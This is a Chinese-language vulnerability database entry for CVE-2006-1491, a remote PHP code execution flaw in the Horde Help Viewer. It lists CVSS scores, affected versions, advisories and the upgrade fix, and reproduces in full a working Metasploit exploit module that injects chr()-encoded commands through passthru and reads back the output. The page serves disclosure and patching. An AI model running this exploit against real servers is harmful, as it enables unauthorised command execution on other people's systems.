CVE-2006-1491
CVSS7.5
发布时间 :2006-03-29 17:02:00
修订时间 :2011-05-13 00:00:00
NMCOES    

[原文]Eval injection vulnerability in Horde Application Framework versions 3.0 before 3.0.10 and 3.1 before 3.1.1 allows remote attackers to execute arbitrary code via the help viewer.


[CNNVD]Horde Help Viewer远程PHP代码执行漏洞(CNNVD-200603-484)

        Horde是个以PHP为基础的架构,用来创建网络应用程式。
        Horde Webmail应用处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        由于Horde Help Viewer模块代码实现上的问题,远程攻击者可以直接在CGI参数中注入PHP代码在服务器上执行。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

cpe:/a:horde:application_framework:3.0.3
cpe:/a:horde:application_framework:3.1
cpe:/a:horde:application_framework:3.0.4
cpe:/a:horde:application_framework:3.0.4_rc1
cpe:/a:horde:application_framework:3.0.4_rc2
cpe:/a:horde:application_framework:3.0.6
cpe:/a:horde:application_framework:3.0.9
cpe:/a:horde:application_framework:3.0.1
cpe:/a:horde:application_framework:3.0.8
cpe:/a:horde:application_framework:3.0.2
cpe:/a:horde:application_framework:3.0.7
cpe:/a:horde:application_framework:3.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1491
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1491
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-484
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/25516
(PATCH)  XF  horde-help-viewer-command-execution(25516)
http://www.securityfocus.com/bid/17292
(PATCH)  BID  17292
http://securitytracker.com/id?1015841
(PATCH)  SECTRACK  1015841
http://lists.horde.org/archives/announce/2006/000271.html
(PATCH)  CONFIRM  http://lists.horde.org/archives/announce/2006/000271.html
http://www.vupen.com/english/advisories/2006/1154
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1154
http://www.novell.com/linux/security/advisories/2006_07_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2006:007
http://www.gentoo.org/security/en/glsa/glsa-200604-02.xml
(UNKNOWN)  GENTOO  GLSA-200604-02
http://www.debian.org/security/2006/dsa-1034
(UNKNOWN)  DEBIAN  DSA-1034
http://www.debian.org/security/2006/dsa-1033
(UNKNOWN)  DEBIAN  DSA-1033
http://www.attrition.org/pipermail/vim/2006-March/000671.html
(UNKNOWN)  VIM  20060330 Recent unspecified Horde vuln is eval injection
http://secunia.com/advisories/19692
(VENDOR_ADVISORY)  SECUNIA  19692
http://secunia.com/advisories/19619
(VENDOR_ADVISORY)  SECUNIA  19619
http://secunia.com/advisories/19528
(VENDOR_ADVISORY)  SECUNIA  19528
http://secunia.com/advisories/19504
(VENDOR_ADVISORY)  SECUNIA  19504
http://secunia.com/advisories/19485
(VENDOR_ADVISORY)  SECUNIA  19485
http://lists.horde.org/archives/announce/2006/000272.html
(UNKNOWN)  CONFIRM  http://lists.horde.org/archives/announce/2006/000272.html
http://cvs.horde.org/diff.php?f=horde%2Fservices%2Fhelp%2Findex.php&r1=2.85&r2=2.86
(UNKNOWN)  CONFIRM  http://cvs.horde.org/diff.php?f=horde%2Fservices%2Fhelp%2Findex.php&r1=2.85&r2=2.86

- 漏洞信息

Horde Help Viewer远程PHP代码执行漏洞
高危 输入验证
2006-03-29 00:00:00 2006-04-05 00:00:00
远程  
        Horde是个以PHP为基础的架构,用来创建网络应用程式。
        Horde Webmail应用处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        由于Horde Help Viewer模块代码实现上的问题,远程攻击者可以直接在CGI参数中注入PHP代码在服务器上执行。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://www.horde.org

- 漏洞信息 (1660)

Horde <= 3.0.9, 3.1.0 (Help Viewer) Remote Code Execution (metasploit) (EDBID:1660)
php webapps
2006-04-10 Verified
0 Inkubus
N/A [点击下载]
##
#        Title: Horde <= 3.0.9, 3.1.0 (Help Viewer) Remote PHP Code Execution Vulnerability
#    Name: horde_help_module.pm
# License: Artistic/BSD/GPL
#         Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
#  - This is an exploit module for the Metasploit Framework, please see
#     http://metasploit.com/projects/Framework for more information.
#
## Coded by Inkubus <inkubus@inbox.lv>

package Msf::Exploit::horde_help_module;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
	'Name'     => 'Horde help viewer module remote PHP code execution',
	'Version'  => '$Revision: 1.0 $',
	'Authors'  => [ 'inkubus < inkubus [at] inbox.lv >' ],
	'Arch'     => [ ],
	'OS'       => [ ],
	'Priv'     => 0,
	'UserOpts' =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 80],
		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
		'RPATH' => [1, 'DATA', 'Path to the Horde help module', '/horde/services/help/'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },

	'Description' => Pex::Text::Freeform(qq{
			This module exploits an arbitrary PHP code execution flaw in the Horde web
		mail software. This vulnerability is only present in the "Help Viewer Module".
		Horde versions 3.0 up to 3.0.9 and 3.1.0 are vulnerable.
}),

	'Refs' =>
	  [
		['OSVDB', '15945'],
		['CVE',   '2006-1491'],
	  ],

	'Payload' =>
	  {
		'Space' => 512,
		'Keys'  => ['cmd', 'cmd_bash'],
	  },

	'Keys' => ['horde'],

	'DisclosureDate' => 'Mar 28 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host    = $self->GetVar('RHOST');
	my $target_port    = $self->GetVar('RPORT');
	my $vhost          = $self->GetVar('VHOST') || $target_host;
	my $path           = $self->GetVar('RPATH');
	my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;

	# Add an echo on each end for easy output capturing
	$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";

	# Encode the command as a set of chr() function calls
	my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

	# Create the get request data
	#my $data = "?do=page&template={\${passthru($byte)}}";
	my $data = "?show=about&module=;\".passthru($byte);'.";

	my $req =
	  "GET $path$data HTTP/1.1\r\n".
	  "Host: $vhost:$target_port\r\n".
	  "Content-Type: application/html\r\n".
	  "Content-Length: ". length($data)."\r\n".
	  "Connection: Close\r\n".
	  "\r\n";

	my $s = Msf::Socket::Tcp->new(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError){
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$self->PrintLine("[*] Sending the malicious Horde request...");

	$s->Send($req);

	my $results = $s->Recv(-1, 20);
	$s->Close();

	if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
		my $out = $1;
		$out =~ s/^\s+|\s+$//gs;
		if ($out) {
			$self->PrintLine('----------------------------------------');
			$self->PrintLine('');
			$self->PrintLine($out);
			$self->PrintLine('');
			$self->PrintLine('----------------------------------------');
		}
	}
	return;
}

1;

# milw0rm.com [2006-04-10]
		

- 漏洞信息

24322
Horde Help Viewer Arbitrary Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS, Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-03-28 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 3.1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Horde Help Viewer Remote PHP Code Execution Vulnerability
Input Validation Error 17292
Yes No
2006-03-28 12:00:00 2006-07-19 08:07:00
The vendor disclosed this vulnerability.

- 受影响的程序版本

S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
Horde Project Horde 3.0.9
Horde Project Horde 3.0.8
Horde Project Horde 3.0.7
Horde Project Horde 3.0.6
Horde Project Horde 3.0.4 -RC 2
Horde Project Horde 3.0.4 -RC 1
Horde Project Horde 3.0.4
Horde Project Horde 3.0.3
Horde Project Horde 3.0.2
Horde Project Horde 3.0.1
Horde Project Horde 3.0
Horde Project Horde 3.1
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Horde Project Horde 3.1.1
Horde Project Horde 3.0.10

- 不受影响的程序版本

Horde Project Horde 3.1.1
Horde Project Horde 3.0.10

- 漏洞讨论

Horde is prone to a remote PHP code-execution vulnerability.

An attacker can exploit this issue to execute arbitrary malicious PHP code and in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.

Horde versions 3.0 up to 3.0.9 and 3.1.0 are vulnerable; other versions may also be affected.

- 漏洞利用

Attackers can exploit this issue via a web client.

The following proof-of-concept exploits are available:

- 解决方案

The vendor has released versions 3.0.10 and 3.1.1 to address this issue.

See the referenced vendor advisories for more information.


Horde Project Horde 3.1

Horde Project Horde 3.0

Horde Project Horde 3.0.1

Horde Project Horde 3.0.2

Horde Project Horde 3.0.3

Horde Project Horde 3.0.4

Horde Project Horde 3.0.4 -RC 1

Horde Project Horde 3.0.4 -RC 2

Horde Project Horde 3.0.6

Horde Project Horde 3.0.7

Horde Project Horde 3.0.8

Horde Project Horde 3.0.9

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站